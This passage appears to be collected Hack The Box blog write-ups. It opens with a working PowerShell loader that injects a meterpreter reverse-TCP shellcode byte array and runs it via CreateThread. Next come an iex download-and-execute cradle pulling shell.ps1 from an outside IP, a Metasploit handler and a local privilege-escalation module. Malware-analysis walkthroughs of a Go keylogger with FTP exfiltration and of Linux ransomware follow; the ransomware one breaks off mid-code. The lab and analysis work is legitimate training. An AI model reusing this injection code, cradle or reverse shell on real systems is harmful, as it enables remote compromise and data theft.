[Byte[]] $oYFigiQwf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x5,0x39,0xa,0xa,0x10,0xa,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5


$XQXihJenTp = $JoDMBHBRFCPbBq::VirtualAlloc(0,[Math]::Max($oYFigiQwf.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($oYFigiQwf,0,$XQXihJenTp,$oYFigiQwf.Length)

$JoDMBHBRFCPbBq::CreateThread(0,0,$XQXihJenTp,0,0,0)

Transporting Shell.ps1

powershell -Command 
"$c=new-object net.webclient;
iex $c.downloadstring('http://10.10.16.10:8000/shell.ps1')"

Metasploit Payload and Instance

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.10
set lport 1337
run

And we got our first flag!!

27c8ead73af56159c49fec2e895bda01

Post Exploitation

Again Metasploit Stuff

Now comes the post exploitation part, so for that we used Metasploit's default suggester which gives potential modules.

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

These are x86 version meterpreter exploits but we want x64 version, so we have to migrate to an x64 process to do this.
And for this, we have used the conhost.exe process.

Now after doing the same exploit suggester, we found this to be vulnerable. So we used it and got the system shell. 👍

use exploit/windows/local/ms10_092_schelevator
set SESSION 1
set lhost 10.10.16.10

And finally got the root shell.

960b5b48915c3d781eb275a5f8965e6f

HTB Sherlocks Loggy May 2025

Tue, 06 May 2025 00:00:00 GMT

Sherlock Scenario
- Janice from accounting is beside herself! She was contacted by the SOC to tell her that her work credentials were found on the dark web by the threat intel team. We managed to recover some files from her machine and sent them to the our REM analyst.
Category: Malware Analysis
Difficulty: Easy
File:- Loggy.zip

For this Sherlock we are provided with a zip file that contains some image files taken the users computer, the malicious file in a zip file, and a text file named, keylog.txt.
The danger.txt file just has some warnings about the malicious windows executable in danger.zip. I went ahead and extracted the malicious file onto my Kali Linux VM and took a look at the first task in the Sherlock.

Task 1

What is the SHA-256 hash of this malware binary?

I went ahead and obtained the SHA-256 hash via using the sha256sum cli tool.

6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c

Task 2

What programming language (and version) is this malware written in?

So see in which programming language this malware is written, i will use DIE (Detect it Easy),

Golang 1.22.3

Task 3

There are multiple GitHub repos referenced in the static strings. Which GitHub repo would be most likely suggest the ability of this malware to exfiltrate data?

I used floss tool by Mandiant,
The FLARE Obfuscated String Solver (FLOSS, formerly FireEye Labs Obfuscated String Solver) uses advanced static analysis techniques to automatically extract and deobfuscate all strings from malware binaries.
You can use it just like strings.exe to enhance the basic static analysis of unknown binaries.

FTP (File Transfer Protocol) might be useful to threat actor to exfiltrate data so this is the answer.

github.com/jlaffaye/ftp

Task 4

What dependency, expressed as a GitHub repo, supports Janice’s assertion that she thought she downloaded something that can just take screenshots?

I used same floss tool for extracting related string which might look like tool which do something that can just take screenshots.

github.com/kbinani/screenshot

Task 5

Which function call suggests that the malware produces a file after execution?

To examine all imported APIs, I used pestudio tool which identifies key indicators in Windows executable files.
Under imports section we can see WriteFile which is being imported from kernel32.dll library.

WriteFile

Task 6

You observe that the malware is exfiltrating data over FTP. What is the domain it is exfiltrating data to?

I tried so find C2 domain in strings but unable to see it so i used IDA Disassembler, Decompile and Debugger Free version.
After importing it in ida i look out for function which exfiltrate data through ftp and i found this function, sendFilesViaFTP which contain this string which contains domain,

Here is the decompiled pseudocode,

// main.sendFilesViaFTP
__int64 main_sendFilesViaFTP()
{
  __int64 v0; // rcx
  int v1; // eax
  int v2; // ecx
  int v3; // r8d
  int v4; // r9d
  int v5; // r10d
  int v6; // r11d
  _QWORD v8[2]; // [rsp+100h] [rbp-58h] BYREF
  _QWORD v9[6]; // [rsp+110h] [rbp-48h] BYREF

  github_com_jlaffaye_ftp_Dial(
    "gotthem.htb:21not a PNG fileComputerNameEx: extra text: ControlServiceOpenSCManagerWRegSetValueExWCreateProcessWDwmEnableMMCSSDwmShowContactGetStockObjectGetPixelFormatSetPixelFormatGdiplusStartupSizeofResourceModule32FirstWGetSystemTimesVirtualAllocExCoInitializeExCoUninitializeSysAllocStringwglMakeCurrentDragQueryFileWDragQueryPointDefWindowProcWSetWindowTextWGetWindowTextWScreenToClientSetWindowLongWGetWindowLongWInvalidateRectReleaseCaptureClientToScreenCloseClipboardEmptyClipboardCallNextHookExinvalid syntax1907348632812595367431640625unexpected EOFunsafe.Pointer on zero Valueunknown methoduserArenaStateread mem statsallocfreetracegcstoptheworldGC assist waitfinalizer waitsync.Cond.Waits.allocCount= nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod",
    14,
    0,
    0,
    0);
  v8[0] = MEMORY[0x16];
  v8[1] = v0;
  v9[0] = main_sendFilesViaFTP_Printf_func1;

  v9[2] = 35;
  v9[1] = &aX509UnhandledC[272];
  v9[4] = 1;
  v9[5] = 1;
  v9[3] = v8;
  v1 = log__ptr_Logger_output(log_std, 0, 2, v9);
  return runtime_deferreturn(v1, 0, v2, (unsigned int)v9, 0, v3, v4, v5, v6);
}

gotthem.htb

Task 7

What are the threat actor’s credentials?

Some how i can't able to see username, password in pseudocode maybe because those are loaded from other section like these are static strings embedded in .rdata and are referenced via LEA into registers so i used IDA-View and in this i found both,
It happens because Hex-Rays is C-centric, not Go.

NottaHacker:Cle@rtextP@ssword

Task 8

What file keeps getting written to disk?

Again file name is written in read-only section of binary (.rdata), in main_logKey function,

Here is main_logKey decompiled code,

// main.logKey
void *__golang main_logKey(__int64 a1, int a2, __int64 a3, int a4, int a5, int a6, int a7, int a8, int a9)
{
  __int128 v9; // xmm15
  int v10; // ecx
  int v11; // ebx
  const char *v12; // rax
  int v13; // ecx
  int v14; // r8d
  int v15; // r9d
  int v16; // r10d
  int v17; // r11d
  int v18; // r8d
  int v19; // r9d
  int v20; // r10d
  int v21; // r11d
  int v22; // r8d
  int v23; // r9d
  int v24; // r10d
  int v25; // r11d
  __int64 v26; // rax
  int v27; // r10d
  int v28; // r11d
  __int64 v30; // [rsp-38h] [rbp-48h]
  __int64 v31; // [rsp-38h] [rbp-48h]
  __int64 v32; // [rsp-30h] [rbp-40h]
  __int64 v33; // [rsp-28h] [rbp-38h]
  __int64 v34; // [rsp-20h] [rbp-30h]
  __int64 v35; // [rsp-18h] [rbp-28h]
  __int128 v36; // [rsp+0h] [rbp-10h] BYREF

  v10 = a1 - 8;
  switch ( a1 )
  {
    case 8LL:
      v11 = 11;
      v12 = "[BACKSPACE]NottaHacker/dev/stdout/dev/stderr";
      break;
    case 9LL:
      v11 = 5;
      v12 = "[TAB][ALT][ESC]false<nil>ErrorwritecloseMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalGetDCTYPE PRET 1562578125int16int32int64uint8arrayslice and NRGBAdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleep cnt=gcing MB,  got= ...\n max=scav  ptr ] = (usageinit  ms, fault tab= top=[...], fp:ntohstls: Earlyfileshttpsimap2imap3imapspop3shostsGreeksse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at Classparse[CTRL][LEFT][DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 13LL:
      v11 = 7;
      v12 = "[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 16LL:
      v11 = 7;
      v12 = "[SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 17LL:
      v11 = 6;
      v12 = "[CTRL][LEFT][DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 18LL:
      v11 = 5;
      v12 = "[ALT][ESC]false<nil>ErrorwritecloseMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalGetDCTYPE PRET 1562578125int16int32int64uint8arrayslice and NRGBAdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleep cnt=gcing MB,  got= ...\n max=scav  ptr ] = (usageinit  ms, fault tab= top=[...], fp:ntohstls: Earlyfileshttpsimap2imap3imapspop3shostsGreeksse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at Classparse[CTRL][LEFT][DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 20LL:
      v11 = 10;
      v12 = (const char *)&unk_650313;
      break;
    case 27LL:
      v11 = 5;
      v12 = "[ESC]false<nil>ErrorwritecloseMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalGetDCTYPE PRET 1562578125int16int32int64uint8arrayslice and NRGBAdefersweeptestRtestWexecWexecRschedhchansudoggscanmheaptracepanicsleep cnt=gcing MB,  got= ...\n max=scav  ptr ] = (usageinit  ms, fault tab= top=[...], fp:ntohstls: Earlyfileshttpsimap2imap3imapspop3shostsGreeksse41sse42ssse3SHA-1P-224P-256P-384P-521ECDSA (at Classparse[CTRL][LEFT][DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 32LL:
      v11 = 7;
      v12 = "[SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 37LL:
      v11 = 6;
      v12 = "[LEFT][DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 38LL:
      v11 = 4;
      v12 = "[UP]";
      break;
    case 39LL:
      v11 = 7;
      v12 = "[RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    case 40LL:
      v11 = 6;
      v12 = "[DOWN]StringFormat[]bytestringSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondBitBltPatBltEndDocLineToMulDivPBSZ 0PROT P390625uint16uint32uint64structchan<-<-chan ValueRGBA64Gray16sysmontimersefenceselect, not object next= jobs= goid sweep  B -> % util alloc free  span= prev= list=, i =  code= addr= m->p= p->m=SCHED  curg= ctxt: min=  max= (...)\n m=nil base GetACPlistensocket, val X25519%w%.0wnetdnsdomaingophertelnet.localreturn.onionip+netSaveDCCommonrdtscppopcntcmd/goheaderAnswerLengthsendtoSTREETavx512rdrandrdseed[ENTER][SHIFT][SPACE][RIGHT]float32float64readdirconsoleTuesdayJanuaryOctoberMUI_StdMUI_DltEllipseEndPageSetRectToAsciiUSER %sPASS %sREST %dSTOR %s19531259765625invaliduintptrSwapperChanDir Value>NRGBA64forcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingUNKNOWN:events, goid= s=nil\n (scan  MB in pacer: % CPU ( zombie, j0 = head = panic:  nmsys= locks= dying= allocsGODEBUG m->g0= pad1=  pad2=  text= minpc= \tvalue= (scan)\ttypes : type CopySidWSARecvWSASendconnectnil keyderivedInitialwindowswsarecvwsasendlookup writeto%03d %sFillRgnpdh.dllIsChildSetMenuavx512fos/execruntimeSHA-224SHA-256SHA-384SHA-512Ed25519MD2-RSAMD5-RSAserial:::ffff:answersFreeSidSleepEx2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsave#internGoString";
      break;
    default:
      if ( (unsigned __int64)(a1 - 48) <= 9 )
      {
        *(_QWORD *)&v36 = &RTYPE_int;
        *((_QWORD *)&v36 + 1) = runtime_convT64(a1, a2, (int)a1 - 48, a4, a5, a6, a7, a8, a9);
        v11 = 2;
        a4 = 1;
        a5 = 1;
        LODWORD(v12) = fmt_Sprintf((unsigned int)&unk_64F0A9, 2, (unsigned int)&v36, 1, 1, v22, v23, v24, v25, v30);
      }
      else
      {
        v13 = a1 - 65;
        *(_QWORD *)&v36 = &RTYPE_int;
        if ( (unsigned __int64)(a1 - 65) > 0x19 )
        {
          *((_QWORD *)&v36 + 1) = runtime_convT64(a1, a2, v13, a4, a5, a6, a7, a8, a9);
          v11 = 12;
          a4 = 1;
          a5 = 1;
          LODWORD(v12) = fmt_Sprintf((unsigned int)&unk_650E58, 12, (unsigned int)&v36, 1, 1, v18, v19, v20, v21, v30);
        }
        else
        {
          *((_QWORD *)&v36 + 1) = runtime_convT64(a1, a2, v13, a4, a5, a6, a7, a8, a9);
          v11 = 2;
          a4 = 1;
          a5 = 1;
          LODWORD(v12) = fmt_Sprintf((unsigned int)&unk_64F0A9, 2, (unsigned int)&v36, 1, 1, v14, v15, v16, v17, v30);
        }
      }
      break;
  }
  v36 = v9;
  v26 = runtime_convTstring((_DWORD)v12, v11, v10, a4, a5, a6, a7, a8, a9, v30);
  *(_QWORD *)&v36 = &RTYPE_string;
  *((_QWORD *)&v36 + 1) = v26;
  fmt_Fprintf(
    (unsigned int)go_itab__os_File_io_Writer,
    (_DWORD)runtime_bss,
    (unsigned int)&unk_64F10B,
    3,
    (unsigned int)&v36,
    1,
    1,
    v27,
    v28,
    v31,
    v32,
    v33,
    v34,
    v35);
  return os__ptr_File_Sync(runtime_bss).tab;
}

keylog.txt

Task 9

When Janice changed her password, this was captured in a file. What is Janice's username and password

There is one keylog.txt is given in zip, so when i open it in sublime and it looks like bunch of keystrokes registered in file,

Here is user janice written key by key,
- So we have to extract password similarly.

janice:Password123

Task 10

What app did Janice have open the last time she ran the "screenshot app"?

Solitaire

HTB Sherlocks Lockpick May 2025

Tue, 06 May 2025 00:00:00 GMT

Sherlock Scenario
- Forela needs your help! A whole portion of our UNIX servers have been hit with what we think is ransomware. We are refusing to pay the attackers and need you to find a way to recover the files provided.
Category: Malware-Analysis
Difficulty: Easy
File:- lockpick1.zip

By extracting lockpick1.zip file, we get one another bescrypt.zip and after extracting it using password given in the DANGER.txt we get elf binary which is linux executable.

Task 1

Please confirm the encryption key string utilized for the encryption of the files provided?

Here is the decompiled code of main,

undefined8 main(void)
{
  process_directory("/forela-criticaldata/","bhUlIshutrea98liOp");
  return 0;
}

Here is the decompiled code of process_directory,

void process_directory(char *param_1,undefined8 param_2)

{
  int iVar1;
  char *pcVar2;
  char local_418 [1024];
  dirent *local_18;
  DIR *local_10;
  
  local_10 = opendir(param_1);
  if (local_10 == (DIR *)0x0) {
    printf("Error opening directory: %s\n",param_1);
  }
  else {
    while (local_18 = readdir(local_10), local_18 != (dirent *)0x0) {
      iVar1 = strcmp(local_18->d_name,".");
      if ((iVar1 != 0) && (iVar1 = strcmp(local_18->d_name,".."), iVar1 != 0)) {
        snprintf(local_418,0x400,"%s/%s",param_1,local_18->d_name);
        if (local_18->d_type == '\x04') {
          process_directory(local_418,param_2);
        }
        else if ((local_18->d_type == '\b') &&
                (((((pcVar2 = strstr(local_18->d_name,".txt"), pcVar2 != (char *)0x0 ||
                    (pcVar2 = strstr(local_18->d_name,".sql"), pcVar2 != (char *)0x0)) ||
                   (pcVar2 = strstr(local_18->d_name,".pdf"), pcVar2 != (char *)0x0)) ||
                  ((pcVar2 = strstr(local_18->d_name,".docx"), pcVar2 != (char *)0x0 ||
